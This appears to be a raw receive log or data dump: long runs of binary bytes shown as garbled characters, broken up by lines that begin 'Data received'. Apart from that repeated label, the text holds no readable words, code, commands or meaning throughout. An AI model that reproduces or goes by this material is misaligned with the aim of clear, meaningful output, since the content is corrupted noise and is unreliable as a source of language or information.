Ù*@Æ®Aąeg̎n¶ÕŒtú ý¦ö@rÔVqÌÐz•y …BÍ­:¼[›jõBHF¾¼‡>ä k:hÈ3¹‰Ì!«ôV’ÄãJ ä§^^¾ƒ
Data received ÐÞJº¥ªÓŒ/êïšo°Ø½x­f`Ñ0Š o£ë÷‘K‰0^3ß՝¶6/Ž©² ‘v*%ks±3/鈄¦aÚØÓ£¨þ¢ëgA ÿÌêÏF+g6v‡§½n†3?»°ª›¨ g6?äÚ{©£š’…Ôú ÿu»°> ýÃÜþÂt•u†J´£ޕ/Àd$7StZbҞT¿X*ÂR1nÈn”ç9­ÙÄêTKEuBlßaöÿ–ïC‘å}6Z·F?Ë]çôú˜;bž´Ð My[žhÓ§2Ÿ¶ò8cänÍìëpƒN«hŠêhdÃ'6¦GŠj<Ê۟ŒF-QŒTë”9È®²[ñì£^ —7ä´©÷<ŒÖÓp€τv€Yw00õkÞ7Tq£Õ͗בJõ¨c˜ÆŠ¥ˆ¹>À}pyOñö 7÷œ…³«l*³æsÀê@=hu͐ Û®©$}{¡?þ[üÄPÂk"ð“¢ÄôE5*šª¤d^žKF„G3Gäróu3K.á"3FèᩜNe‡¥7ª–G'?%ìÌõf-­K‡•W,àZý&WÚ³*ËÁö'ß^XÆa¬°J©3‚½ÇŒ;Tàp”Ú!¦ÛСé ovÒmyrˆµ ÏñB<E{Vˆ½[+ñ‹C†^ .‰Vûk×踳ω ‡µbp½jp¥ä`3Ô¦– ½{\‚C"Ž½ÿǍþƒÎËkþª%LWº°f4¾Iš]ğÿ8êхs Íc®ÉTP;cn£ÁŒR[Š\c ª†¦¡™Ôùc±Ò/ªü¡¼}’áŒàs`,|ƒWK±l²ø…€QƒÊî"¬õ€+ìóT›Ÿb¾Žô ].ÿ\¶u^6p‘\Ð%3 õHdšzëàŸÜ{}°Xe4Ôሒ̳BüÑBÄ*²ËÉ3fb¶ãÝHwÛ=Á†5¸ç&p¡eÀÌ“Š+]ç2*×Êææ"pY o?6åEŸ#+ôÖpŒ«HB3°Ææ7>Üçq‚ó†ý÷¬ãŒ3wŠz¥(àíÂ<ÏpYÄÅm¨ÿö E”Ô Ëñ!wŽ/ØèJÁ‘ì㠄ÃX¹X*†âwHÑåI¡¸‘q èïd”Ì!H–\ºl°@ÚÇ$vïËÊ× *kmÖx²P7ömˆô3M_9à"/ܚ(î게ñÀ2Œê* ²t“…ןŽeG7¿¥âÛÐ4òᖏ5Jš¼’[0ìÇu‚c9$H²-féï@¢ü%½xnXZî×çCYŠ#bTvæ+]/ûð À|¹¹¸öèëeSÕ¦r–$€shÀb;¡+šÔT à—”Òrºx\l›7HÉà œÐ…ï”ûF(H¼J09Õďó>®‚B‘,ðx±dʼqú¼¼ «€¥“ ìf¨\,ª1ieÅ¿Æ·OÿôƝ©‚ úØh´Š}ïN§w åjAás—ª¼[)Ù2Kÿ' ÎaÑ<¼ñ“DšNÉ»bBøTÞ.frׯû?_ q­Gª±Ïx-‚ã‚þÝ°Ÿ "…ÌjÕj-]iÀ×Pºƒ¤Æà· .E¿Â{ ÆÇv8­žw{ºŠâýÜ­Äènß>r2Á ßà "]W´$ ;zC¿Jçâ*þ´ÅK;s¯#.²öØKÉÛú›¦9W÷rQyJ¨ãUKb¡®«•ßôч‘´æÓiÚJe¤àS÷»•o'g`Ò(tÍí[˜àÃى»¶q¡IT[Èì±vg«×·’œ@ÝêìëV⢼:ÂV °ä€Ç´ ‰Ý𡶠ßY²$xñmÙ
Data received ¤Û:¯0G®_aK*dNZ{À(zSû¦Î ‡#ã$+Ýä,fB“- Øõ0ŠÞèsñ Ÿ–NÓúi“Š½&jڗßàeOS?ÕÇ#ìÕߨ²­ î(P{Ó@Rx i¯Œë±Šº;¥Öµ›.ÀJ$B0ÑrA¹)™f; $ƒÌs.Ͻñ•Êš-FŠ¹}:š¾³›? Iö“˜J²<ù y9ý]¢‚Bÿdïð cn&õY^ç?â7žòg¿÷ÉJºSV2F”>y˜ž‘ÈÖ沕}ι9¾ÑÀ"Å_-aáscŠ/ՈÃ÷7YM‘†‘Äû­Û7zëfì›øÔmºÅ¬s6›:ºþå>Þýƒ쀜«"ó¸6è.Wf{>éNŠ2“묆 øèø¡s‡ÕèÙ<qw€YÕ¶·hfcCN;{UˆðîÄôYÙ.¨i°ûØ|ª¤ôß=Š °ÉËíÖ/ ñnõSç*»°ˆìdÕÉ åIÕÏòÈž*?øS7tb¶1ñrN¥²s¤‘béÎí )ᨆtn{nÝ0ã¨t«–j¯ÍÌ{7…Ñ›æ^ªc˜Ù~©Ó½ëÿÞ=Œ‡V€ñÔP"i~³ÁòTø(õ´áªí=Ž&Zzs÷¤Ž‡OF”wxÒ^ÃïÛÿë\ƒîXµþXÂ6×Qñ Ö«Ÿ"Ž*twû5ïØÐ쬨pÉ"¿9ÏMìäÅ{ýa%ÜÆ¥þ4«;yäûÖáÙÊþ C`A O&1±3ê/`<—®1£|‡>÷ŒqDVV}nš>´xð ÅDLŽ3V’~Y˜Ù¤¸nÕqnŒú£câÚn--€üuÇ ÖôÎhî‡(“Ývɽ)±%ž÷ú¹š¶‘1åÂHW‘àø:Èü'>'i¥Bÿl¸V×Ò¿1_?áíÁ}¶ ^¨ÎµÁþáE­Q{ P_Îw¸²vöBÿ¬‹Í{·ô?í}ºSuzTÿáÊNþ9ʓIܧÆTbÄ®šMÔ"Ïm9Ó÷/ÿo‚XžJL†êã©ÆVö=—ùŒG­qÒÖZú®ž†ENy/Xnì ÄË»åÚ¿Ú_¤(ۆzâ—Á!PɊH-F[a2GäÞL)o;È ”.ñ‹ÐY<7¼õ~ÕÒ!(Š0´`ÊE¨Òàé7pcî1?š®éwï$fâÆYâwY\ªß r•w*V=΍¦Ç×¥z6ŠÑ U·_Oéº¢|YnØuö|ênªeþÐ[Õú¬®l6±õÿOÛ)'\½e÷Ž›ù¥˜¯9‹Â‘_OЉ~A´i¢ê*¦a.º/h²*žÖ{î œÎuéo\èöIÝÜ?õ¡Y¥ 1I!~—Ú•§V`-Än§{âsWs• =—iTâX23¡®ø4o5ŽåÀ*èå;ÝÇ1‰"àhùEkiק1aìÖ[ï·¼qí´€Öq7 Mnº¼Eh³%?Die\¨Ã"Ì <oÓp·ö%ÌïM Ãì½ZûT ìt*H =½b¡Ý›0. à¹[Ü(껞¡Îtð®ÍŠîp¯± Ʒݞ‘uMVÞê`´òÓmbÿ½RÓÿtâ»qL†Á:¯qjbåFq³É v¦Îi“•ß'«JBEf Ü=‘WÛv’™Ðÿ0nri5‚³)âIž¯€Ñ.÷Ò2F^=½KñIÉWçÃ{ÛØþ£¢ÌæëÔm,¯§dd ƒ«Ž¬h‚Â(Í×ÿ›BÃ'aÔª£ÊÊÖ^/ ëø„<é»ÎrjY—ñJp`Y㠇¾{¯¦6È­ÍøÅþ¸n!™n×ì>
Data received ù§LXÚ ZïN2ÆoÝsžÿÏC‰ìTCÒÕ¡ð%£>!nI_k÷ßuҀw©rÖÐϊՋ© =¥ô3‡¼p-©…À+d±f½Áº›@šs۝9þ6È?§9‹°¶¥úuž §”ë~Ç´qoõõ1uZ:f®Á—ë|]hʝĜ»Už ꨵLêÄ Ïþ7g8Š´ ê%РƟÜ9?‰áãÜZfÇq —}+”,4¥›Ã_{ŸIs€ôAr`v¦gH§¶{¤(ƒzVÁY &¡¬¦Mky ¿<Â\äŸ{‘¿ïÔäò•¾þ`¿ âÅï ý5ôšÔK¶Sn¿’fE,‡³Xð󱐞¾HÁ?”ý`wíú›!-©‰¦±!ÇøqoSEo¦}ô‚–öáU4ºßIÁß1w€ÙÃpw`5\i«¶Ž•„B4i yìcR€&jÊß½Pý—o›Œü)+ÑMpöÅeÏ»¼œ¼ÂrŒ—O Îðêgä +tøf¹ÞgÏ2XŒ@qœŒbTfõç\ñW¶&ºõ”dFäʃ+°õ**~cÛ õŒµƒ}õTu4R'+óæ™\-¿åë=Z›¯,Z¹ØG÷×0- rã¬s)…Ê0Ýö ð»án!‘7f=â|r@©£/C¤èÄ3FY»–‹5¯Õ©Æè6¨lŒ*1îºèéUßFÈëZµ‹q«úßeè묺PXû&U¼ :C†´3¢B² ßÒƒ²¢œ³j¸dŽ m ;â^ <fAý•I6—€äËçÖ÷. e|bºœ¯X”¼d–>£ 3û&´>—.âC.nQ'ÔFNhÚä°\Ž¹7.iàG¾¯ñꕼQ™w m5| ÃÈc…†çår å+Ð4hÆ+ˆÙjvfêÑ\ß]ôÏB¬ì9DðE®YžeâbÍ5Ùc¹ÿZ‘U]•Ÿë@Ðûwsž„O6ý۝»ñ’ß)£Ïš \àP¯«®ÉÛTV¹ï²ÚhR‹\wDÿJg0otæ>uœáŒÀDÊÆ"œo {™*ÿ D…èÄN¦€{‘²\eí¶¿éÂkž:ÌhòWöõÉR½šßP?çÊ?„¬«¼Uÿd'=u¬p0=cø71¦"2—:Õߗ—΋#m¿H»í¥YxJÞÖ ýþnƕè”.„nh9z˜ÄIÑgeÑýŸÀ/†Œ üêC>…\/X˜–dõå ƒ»êª|Žžëp“ƒ¦…•X¨aGAêùǛ@=»r Xʆ6wwïSۖE}CT¡eððÌ"kd@†ù÷ùúØòd5ðç;ˆÁ/ŽÄ›Äº²±O»T÷í/¸Ï>ç<·5âŒÚ˜!ä/•ÿ ®©J­ãT9ä'÷£l~Q‡Û ÿ‹@a‚6¥„ÖýÜ:ìÿ×ó[.Š¹Æñp–sœ-o±8wº×E ®ê¾¤gh›n ´ià’°ŽqϳQMŠø™¡î†Ï: ŽÎmà‰[_3½:ÁÉÝGìõÑ~£ßLšÐêEBï֢߸{6<5dÌ|3¯øG’Ϻ!ÙÄe¡EÉn°ð Óê@Òåú±ôÅ?‡Àd•û†¬¶b¯¶°Áì×úÎÞâ=hK À §»‘{cV¯Ÿ C’.[ÚßB³îcúÂA1«êY±çËIœµVSd,,­HàÝ،-þž:Zí ÏÞÝn!/TŸËùÔÐ;Y‚aÌÁÿ‰ÞXj™X`qà4ÞȯQ›¸ ✂ÍJïNÊv
Data received „‚Ÿ:ÉYׂóî×?]“Öø>þt Mø9Á)ow9Ξ“*(&5Ãz`áÙÊ b&.C¤´§öyX®Ì(Ñ3óKÓ ,,•>¬d±9öÂX£HÔGóýLoe‡ÇUw|{ª  éî¹¹S_è ,ïÌm ê&îÊ~Z\¶‹4ªßù¿kÿÞ ËxE––âÛÿzÿÁq®» ÕȜò^a›öÙâýB(òáÊ«`áæ|{—¹-_eÁåh;”ô¹Æò:qi<¸õEâ‡n=ÙBĒq>!k.@–~§û–¯¤'/{®Zµ°—IËaCë\~*4°ÅX§a¸G÷¼èåzÂòö7Q#Âè5¡Ù“ItdÑ$Ý­Hó õ¶">¢Qñ; ÜkôÖìúUûw„4[OW…&€ƒg$àI8Nå<ÃßW)ÔSUŠÛ í'GjOAÑ®‡y<¹6½¾@ÐpåOs«Ó«g§C!¨Áìqd›ƒÖ+>«pÝe:÷”µËv¦ßU;+IŒƒ,Tà¢v éG&šÕ…AÿñÁö^ëlù²Ñ › @‹ôHˆÞL‚£xp ì%« Jo +˜fÕ/â€9ãÛJChëšdÔ¢“¤Êü`wߪG_dÐg½µd[±ê< íØæ•'ûn¾~¾@T’¡¨¨]Î5k,Ö“YGΫ<vSãP䘣‚4HÊdÄ:P½Ý”ÔµE€’­Š1ø:Ê9¤íVÙÅ <|˜cTxòé%v’Ž^3ï¯ÁQÿîbÃûe¿'%§ã=ýÖgj`rë®>ÁàG–„B¯WFÙIùâM#˜ÿR¤èûsIH¡°þKç$\NZ<¢Ëµ*j½1ëç)ò ž7¤Ê2*¤rœh‡¼j“ÿ4¥^Qí|ûXå©Ì£lž¼>g›oºõ”×ZîœÆÉîà)7ö(€§™ôòلÛn¶ ²b2îH—´Ü›«*«¾dr\²Ÿ-£ü8æá›Ù"jQ›srñ¬ÀèŽb­rS”?«ìáGå:Ûϯùç2/Ge}܂ ðñ»`²Ù2ç÷ÉHãw÷×¼ÄÍÐuLÊá‹š¾;ì6@ÅCs.Êø›zwÕÃð·6çº X3¹RÜEЛӣ¿!^¡À6ƒÞ䉾‚ˆ¦Xˆ!:dz ‡Jн¨ýA±}4멪 ‘‰_¹xêæJˆé¢P£,…ÿDŒºÄ ²-ë Ë·ÁÑH¾ÞÁy{7ÃBÏ eÔtŠÚ[–* ‘Ïò8É»[EÚ¦<¿wÌU½ºòËÕޏühÞ772e¶¦F{ì}}.Õ32,U¦ÚÒQØÎԈµ%–TÀÜÛ±v”¹"§n=5Ÿˆ!=o ïS ëy¢CBÅ5è‚ÿüGÜùÆàÏD¨îñš,Rsaµô6²]}l+U åOh¾cûL‚>¾B´9d¦jŸ $­Én×ƭܛ'oø…«¥o¥3^çÓ>ÕôjÙ-ã"W¸YnÆM[mû͖Ð; OŒŒÓÇA!O[·ÄÒ1ïÔ;LÖqR‡–ÙŠÏdÆ·ˆé1K_­ÿ<µ=Ž®¿tÜxÑ´¢ê‚p# ʧçæ[Ú¡†9»"1ô°p{µ£™n0“|ö0º!ÜÒ~áOűsíˆÿÔ[g‰ö­›ÄT]Ýcò·µ‰·ä¶††ô$­©Áºèo-!²š#CæÏ ê±èb¦LÜ`‘A&Q²j¡Vt?ÁÖ¢ĠꈢÊå¹}<&p>`ïΔ›^9£Á€}¿n ™Ù=Ñ,
Data received çëN°Yl˜‹ª=ßC‘¥ái´}è6ދyðæ3ùD©I6ç§(è©ãÚFÿà Q‚ͨí&ôu vAëðyZôڙæq$fQ¼G9͕µµcÇ\ÁÄ«T¢ ÞÂî3\vzb’ËMŸm:ì™=ÃðeÚJ—õxìȎíњ}+þ<ªr“¿Øâü^—õ’À3ïêéù6ûÚ·>Fhá»#î ё þë£Faë"K‘w¢ð×8GQæÚҧ냤 ^€Õ9ºÐB‰#`swªš~ä:YUÉ­(O;dO5Zj|Çgä> µm,¼ŒJúg™CÓÆ葠 }ãhY¯ È{OXãjB‚»Õ­5 O^³1q1œ ÐôobÔêȞ\ÁÁ_âÐ T[[Ÿ!G>œ‘yb<ŠoÞFðmŠk Ãç/ƒN§ÅêÄf†v¢kžspìwÖOé€ÎeɌB}я™ÎŒ´(Ý"6Gَ38S¦Ë»̓~þ'—…en³ìæ溆1ºóéye\T©Ì3 tÖ²‚w†µ–BHäfvQEC”>ŽÜ_- †ñ ãÛ:~$‰,§x9-¹Tx•ªŠÉ©`I¾¦¶Á;VDt³X©Þ³€1Xᮡóښ^£¨Í|V£ϒþì<=ði‹ïa)æ¤×¾¬êÑx|WÓò³ø&1a\U6*oH7ÀŒ#7t6§áô>MžýööÖl ÜSA¾\Œ88‚ï–AõK”¬ :¹ ÝÙ¼¹Ê|]¶Êìê¢D­·…Œɀ0l ‹g¤‰’&£óšºLÞ»Äæ-ÑÅmëpë\~>a²=´ég§$:j¬.Èñï-iØ œØr{ŒBHlu{S§×! @Í*?ï’)§ÈéK„pAKu9ø´tшKÄZ›ž´Ý̹U ‰±1ÁšTzV¼]ªYÿÆ@Ý¿Å3X¬Õ‚kd曈û3µ~C;p{6Ïí£#=l©Úîk 6þ‡±i¦N“£cA¸þ<¬3¨Df‡z1·¥×[æ¼›AÜá_LÍ°¶°Ç´ë¡&9"lŽ §Ìñ/âãpX‹ –“áFÞ á‹Óá¨5ðh˜N¿ò†"h-½pÓr®-ƒSvÞAÒ£ÿ@qžzɧO‹¹ñýíH&î„Î"lûwFæ1Û?ɒLv=L%¯ž?¬UO9f‚Bçü'ÍÍYžÊeJs5!Wé´{ÛáxÝHrO48¥µeÙß»´ŒYú³®ÎøFTéI}­Á.e9êÂ,Ø®«¢ ¨ôTmsë1XKç×¼ÎJÖ-:×Œ¨wÌ "S . ÇNƒóì=$”[¡ˆ:9¨—¦šmMŒƒ€˜+ƒDÿ†ìlÌ)}Dl$Ò>”LµX/"–Ý»!R´„ŠŠbT| /9¹«SóÔArýËÛPË›Sv$¬lþÓãtœ¡Á·|‘SD.ÈAð‡§<~`)‚Á¢çBu¥À Ð4+“p÷äÅ{g«"4S`=r«ñ ÜÖ¸)·gþÒ\À>X,n`Ú¢/DFD7u?àȹUî[|þ"lŸÆ íX 4Z©wîMÜvÿÔ-zŪeÕÉ 0¸Ó]Bpׄ8êEéÂ3€ÔÅLþÅfxÙ%™Ǎ þÒJ«`tYÈg‘1㫬å´>–×i<0°$0+ÏUB› šË%àüz2cDqò剰:þžá·pÑ#ݖ#^¦–=Ž¤#SHX†´{u?Cµ&QèÃ|¸z-ž3–zpZô´ëL'ç—
Data received øZ r*KxðÝA}3ƒc¡×0T|50‚
Data received &¥Ìeýt̳G²á ^×:ßßäéìp¯t™i%³&ºª4*A°xgvŽá(XOÔЍ™Z?!¿É-G)E­‘ôKî»îfZƟaîôuOæ,ŽW±¶ä鵄BWÒÑÝå Ú/£Œïuê'™v Ocï¯†¬ÊÉ|ýâd‚#á®”AuÐ9ÜF`çÓ2÷.ñ#võŸ¦¹/ÀŒfkZf·.€ÒZœŒZœ³œSX¥) IÁ溰´&,p`Hq¶’}¬ñø*^ÿ†l6qÖÂiVYP}3 SvÐæ¡’9<‚jF ‹Amü~OjWªíÝý­¸M],hõò)ÌM„ΙK}ˆnӎ€{Ï>Ó  l™®-ìc”!Lv<yÍIKñà+¿ZÓ`t´uj~‘î0Î-Z9rjŠ pEÉg§mÀR±¾w.1ð,ëìªQþôØ¥6<Jíφ£X€Œ]1@Œ±nӎ$[v’聗›t™Œ•ŒpÄàgËoJæ¥èŒÎ ¢ß½7ÉV\EËFwäeæŽõ‘y˜®ö™òA+»-‚tžu’ÉSBE‡ðÇèþș“‘>ù:ú‘ˆG+]4&‰RS‹ÃOޗ¡ …ùÄk”CŸ¼yÊÔf žã¹-;âYX%6#B“Ø@|ÒÌÕÿßɸЍ;ö"^vSáJ¶ ­™»PC›è„µ¸%ìv@'éìv7×ÿ(¡ôM]Õù 锖9~þÈEÓ{•”ÕÂބ»JÞÚ%»Î Â¥öD…µTál^ 2Ñ¥g5Õº-bZ3ø\6px„bC¹=ô‘²ˆ•.I/µ¡Hg0jÆÐ>֍9=íËQ9oEe&|ϳ#c꾶rEE™”B €€,+îµÜùM4GÊݔà΍SÉqÅa™”¢<}§ÄMSÂ¥*⻢ìÂTkRqž!l¬ Îœ‘sˆx¯’1@¥£¿;‰÷¦ðï,F5ñ Ö·‰¹£{³túd²Õ=ú-–ÔþW.ïe‰ëQ† ɦԝñï*³¥œãÚÈ¥ÞJÁåÙ™¿¸¥J> ЪťqÏ®³£gž;ˆD f c¡‘°K5ً·:còãTv Œ˜°Û›Êƒ¶÷Ðik<S°óõÍ1iF:rywqóbÇ@ȼ5ªÃ„ŒÒbþ³Ñ¾ ‡Ì.–(Í·&åNe,Yƒ‡s ˿͘šY ãcuÙ*2Fýƒúé5G«~%¢ñÆú³˜?›“fõÒvNÌÂv9wsÿܙwÎøüH×_5*v}Uö–vŒT/!¸n®K!).)høæ?€e@{çD×bÈkcQW›\å¬xáòéƒ__Îô÷ÐI$Ág!eƒ_|[¢D …ÁiSõ6°•9OÍ[3Œ~T}öx2î_ñ—ÂQ.~wÑ{z›É݉xª„†3Û¤8fnvh„Ñ?CS-ƾɷE±>ÐóÀŒF<ëÄȇخ,`Xki¿uÌÆ̧C ƔzaÏ_ö}↊ÌFNÙ Ó§#–‹ÄÐ`ÓóVm•X¼iZZ‰DÑ®#]]B3ÿ^üBÙýp,|o%ôd¬6ûR"¥¯w`}òÌæjÌ^¯3Hyù "ÇÂ:ÖÙCƒŠFÅs›ÆŽ­{ÕiF·Ò_–‹îÃ]¾ iÃw6!J²9':Q˜6cx›À‡(—ê#l¾'º£ùÒÝóZܗâneÁû 2_̔î%åóúÄûI=‰'º]kìzJ‡}6™?6$ Å*‹Að„aå_*£
Data received ™ºe,`D$E$òy9‡Z¡îš‡)æïJýÑjgñÚØ×[w ¬ ›ôð‡é°Œ©.~¡Cn¦ «ö¸ªJHi7 A—y/¨\òâÀÃH2X°:¯× ¶pÎtn’—w2s{ócú´(~s–éäãfFS®í.Û虘;a㎐w“!0Z-'=çø¶(MåwÎ2‰§›“¸4_2\NîR!T"YQë#œš+Yú4¨KÕoígUûS|1úÕ¿¶¬Rëµ*”a¥a÷+áâ¿ì/#¥'ÿ6 žm÷íÐãßÌܜ ‚Rá¦XŸTŒÂä*Tˆ”fàþ ³Ã‚¤šW?Ám¨Ú("­LȽþ‰«ÊóNИõeéêï¯ 0ÊÛ%"À->ÆFá ¦˜Ž4 p)lìbªý²öê¾ÄnTÔMÇK¼Ø¥ŠyìØÊr×uªB×x·©Š}üՁdQ$b'â­õ‘$¼SC_€˜1#zk4þ8 äX ·"‘pµ¸:r]›&Äpg„„D¼œ6¨¥„C$¡§â{è̏D—"µ’hûHSh§ë¦¼²°‰L‹¿ßg™W‰º?Ò§T4\ÁòËUvàS–·‹ä²1øg:yA6˜ú ÉK¯‘‹ÞâÎÝQ€†~å¯4b’0éQgÊ<ª¢u«Nփ-´¥¶N籛ºÒ›„ðj~z²6ŸŠâ"«µ|:²ÓaIÓJûˆ^D?÷i8}Øõ•‹»w±ãD {‹wÄ)gX΂VÔéêv´ø[~j–ë=Ga(ÞÚ}Œ<-¨'Üç€MV¼x³VzØ.¡b\ótwŸÕ$ýÃqÉ· µ¤É›Ýç?·w™tÊñ†Í«ÿ·¡@D¯æ@­ÌèlÚîã$.Ü©½oýðÁû,Èéþ¯¼?Fqñ‹P¸ó÷îr9¿B»‹˜KK;H¹üHs…‘ˆÀ§7ªÝm՚Ù¶ÀÆÑLTŠIª€P ¾–Ô{ÿV½×¯]ïw`ilí»$ü£‰¼µÉxÑ x;S†KâcŽ]á*À/º<8Q//Q˜!ÓÂ)˜£Îª8­ú„¨ïÊã~p.G`ä‹Ã–%«…o¶;n|8Q;3]­d¹äÁ}7˜$þ’ß’5ŒBó¹ ܳ<WÑ>^ ¢Ä˜§½g.É¢9žtA%8%£˜qP¼wƒO@ÿÂܙ„¶ÏÁëbn‡„ª ¼AÔߤüZµÍÚsa¨â, ÔRÇ*Ÿ…3òƾ.}H)5dH‰Iƒu]{ô–§öð¡‰JC ™K|ÝÙ^‚-Ոc•’Õ¥t; 47woN¨=Öj–$4òµÞ¡Axcm ³º¶6³ÌcefkŸ£wG¸Bq›Èז¬õ—ªç6P‘¶¹„m´%«b^’ Nd"¢5ô$\ä*Ô÷¹ÇE÷‡1(  AɀÉÅLæÌ¥]V‰"Î=ޗtWv&†õb4¸ Á•@I×̑4¼H‰8+f¼÷ X'5â Þ=74Ô-¦}ŽgH›s5_Ê/DZZ<ö¾ÛC ÁÙ ,“¨eµæhybt܂}|36ûçóv¥ýºæïpDjiè"±úß2æJzÁ2WHÑ«„è¬Èà‹ÍN§ÜÆÐJÐ#"[øaè*‰$ÚØɃ›RfPòÍ;h<¿o•hÿöÍÞBȧeô\ö‡ <y œ0±‰kk¯Ñ÷Ù!<ƳŠNS:I²¨ÏV)€(BR»LO< ´¾{z3ÃÉÆÖ Õ¦ÿMËz̟9S·ÛïÕ>9•Ãßùå ýª‰ ]ûGuû güz
Data received P
Data received ¯Ï­ˆÛ®"á7c™A¢±ã šø:ˆVOá.b§CÇ+Ì:Ü\%mà%à©y6ÒÁs6®ðL+
Data received «I,ãUÉ𰗡ª<.i!ÚXV2½-²C€/’e3—‚ü3¾Ê¹<­Bé3ý_ëp-Ì0EíHVü“03P¡ùQ@P…˜FZY“8²G,˜Ym?Ãøüžl>ˆÿ£•iǹG7qŽ¢¹³P˜æß^\šgE–)ÃIt;q»iþ«¤n#EU\êšnHµßC×8Zú˜‡­šI»”×ÒûD–OÆ5ˆ VÀc¹Œ€íÚ ä|âë^/}ßÔ¹ô ‹Dµš_}ßàa½ù·WÚÙ vÜö#ŒÐØ `Å 7`ÃþË¥~ñ!²÷l §ò]zTþ3øîHªW²éuJFu“.±ßcL¿ û<{d=ŸºrIãÒÏpË2v¶€ª#ø8Jöb%`ñ6ieX«±e‘k†Z×þÊYÏtérsXâîÔúýxcïd'Ìó¦3dzv¹y€e\btÙèu/‚!¸¬‘¥²‘'‰c°…žÄô±é¦ÎGŸé‹‰ÚI:à ÚÃM«ü¶]™m¿‡HÜa£Ô‰?6ùÄ÷i>ÆåâC˜oց¹o.1 “» v“ÕÛ¹•CÎÉ4 ³²~Bn{ü˜9´ÐCg@”an-B²g§%D–¸ªoÒÔ<QT^O4uPÅÌŒ— S˜ÈâW<f^nêœe䞡 Tê u¡8H!ZËhCØÝóZ߈GÑc)8´…ŠãŠÒ¶‡ËÎØل»¾J4EuÓwK¨—‡ÖòG™Ò›ÚàZoUêª":%¬.¡½1‚öËU¢dNÇÈÚP˜án0´øYªRÜÒDçÄua ¦¾?(¨~‚iAў>²Ô±¢CZÜ÷ÊdÈiþþA\âp˜éýˆ Þ€Â?|tÓk f-VôEt”*Þ$`ûϟ›'ÚN°ä”ªû†ñM#þ/±w9¶úmôwu:7e£Ò÷ŸÎd`gÆ)¸ƒ—§—…ÒH0V £ ³·»q¿ê]”h݀ ®¶BtQ9ÄnŸ!c®ðd¢Ø3Þª.ÚO3
Data received hM\%…s½kpþ»­á9(¨{UuÀýÚڔ/4 1¸Ý¿ºM<i' /]öjHLo`ÄzNÜsPÓF›ñ“ê]§¥;WÇ ÊžH‰]êÔò[k>ŠES¼ÓXtÇcb=÷É`ÙÛxMá~Ya( µ4«·•ËN™9ï=ŒÄŽ›ß<Q4q”lëéE~qcUU¡&¶Š¨¯ßÀ‡‡ÖëyB¼há™@²óx7ù|0øè¦ðuP%©»7q4Øúðyºuܞ2é`£¾¾î×ÚSƒÁùÐf1ŒUVΉÌv™‹@8<(A¾à‰=j3֍×è’i [œ°U§‚ÇAÙ(‰ơ6þóÿÍ+n‡Ol;Ò‡@¦Ì¾ç!Ylqô(Ô…uÉS¨E TW6ì,‘(à^ „8Ç7XÜʼnÕTõ`‹ÍؕÁ\ÇG7ªâýÈ ¹¬æ±Å¢JµÝª%0iäÈÏhΊxnõsÅC-ùkÌÖ;ÜóM –¾9û]]붠›n•LmA)ð´ùæÂþM4ÁXþ»ÏMh³‘5*ò±5WÀ{ÒÏθ=ê7- ¤ÑãYŠ))›&(;øçIcV,qö;/èGi$˜#<sa¢Ïä>gàŽÕÃ$ljr ôÚÐ̜bnyýv:ùû%y¯±äÄ /m¤{Ù'7òzP|+ÉÈ'j«Hp5zìÏ`(X¹Å; “r2÷2K=JŒ@ÒÄÀyiÅCvŽ\C b<+[:ÂyÑ¡Ï`Ò.ʸb·€ä4ž!Çãªdá¡T‘xì ³À via*‘oFü­h@½h’Öâ—to#EzÃå3#tðR•Ž'/lX¹IÇú¾·Ì“Ô°QYä+G•®6OêYº½™Œ0 *÷ª¬Y ´ASV¸<Öhîû}‰cÿ¿ ,0ú¡™rÙ}%}ijŽ1G<óaäšSiÌÛÿÜ"§|hê[•ò 5=‚>É'¹¿xý†٘Ô´i^ía;¢X#ò oŸÜT1¦œbÈa¤…“z^¾Íp[[”=Ղ#ŽŸ¢÷TÄë` MçœÒé¨o×w•Žð)$QˆÐ;ZíkŽ):6úŠ¬ö]©Ñ16Å÷DÈÏÒÒ£¦ ˜ÅÛ<•O´_å íMü] ½–LÔýªUÚöj\(èÓÐM+ºßr鮩–0ê¤4blõÝ/k/fT"û·>9÷–cw€çPº Q˜ÓXÂ&¯zCÇHp¯Û#õµêNLµöÅï{m¿dÂö ù,„´áÊR˜Ua¦<i~rŠª•Rð¡7¹‘Ñ°÷ã°ÇÇܔÔgV/ÞÈ奋> ¸–᜻À;U£ÿ¹)Câ¯QWñ,aóv^¥\?¼Ú@H`ûœ¶÷°0€‰VÀÛ"Iùu<hØì¼ØÚtãÉÅaŽÒ×]ؕ¥ñŠÜ~w;GÃþ]k¤ ý¹ÄI€ÿÜhdO«ö æâ¨Ë®(ÞË*º4_@—#Çzë×T\/Þm”Ûݯ¸cTõ˜æ±"Êsø™g¤\é·ø媸T Å 53p7ð蝤…×âC°•—.Ñ9Y*¸çñìO]»‚ݯ¶»öߋ}D -|OªÇyäMæÂ[°@û6¦º@”R®_`]ùÂTscw“0–CÐ×:÷z&xééK‹Ë›kaU}\/ý%‡šŸˆšIŸÊÁ¦ÍáùqSEnNHëÒ-V R¡t\ø7´Pþ#'Š¤ÂG Y¶wØ]MŽQx}ŸÜ.Ik¹¿’ï>² °nÝKÊËaÃ
Data received É5µëÔ­G¶à²ÿ.Göö)JÚiÑ2¦ú$“׫ê׺qnžr˜¤]ù7jú̐ÌξÞð#-úê ì0mP¦\·ËN¹;fŽÛ\ LªWOCóMóЀ³ q€™0Ûq>©Õ“›óLnøh^bšE{lÓ|do Àˆw‹P‡!ꠄ€”lKS³AC͚ès¿`™{‡2@(y `4”Ê6~þ_KÂÌÓ|èð7úÓ¥ä™\DzK“¦ÀÀÍäþ™ ¢÷Y®–¤ wˆœÇç`<Œß—ÙƖEz¨¤‚8"õ¾¿É°¥ZÖ7āóS~Ã\ñ¤§¨9MA]¸Q¾ÐF²|¿!ӄ"3ì«n¬®IË©é®Æ¬&>ˆôþ­1ÞL§MI÷êßkªL¹t ð]l/N²‚éØù¨™¥$øäL0eÀQ#>‘û úw]†™¼Áî 3؛Îb.þbºÍ„¡V' À¥Â­?4ãe“lHý`¿µ^ÄÁN®b%Rë+Ý$^„jl3ü.ôðÖԍ¤“0==ŠöÝ  'qOpç留 ƒÊX>¯’…jxòáMë_xvô)\¤™ªÒٛ:œð¸Û&uÛ'—þXkÿnoA°hPðÚÙ¢&hg©mYɋíçf(8 4†•>SiÓ0p´ËOd˕‰3ª‚ÜÄiÁºr4eî”Ò]Ÿù×ýâNòûòõhSPD”>YÞ°¹,EyI‰ 6®¤®¸j{d¹£Ú歎Fûø«d8搴¸Á‹¶°>SrD"‡L}”1¿NYù½Q(/ìBZ+(
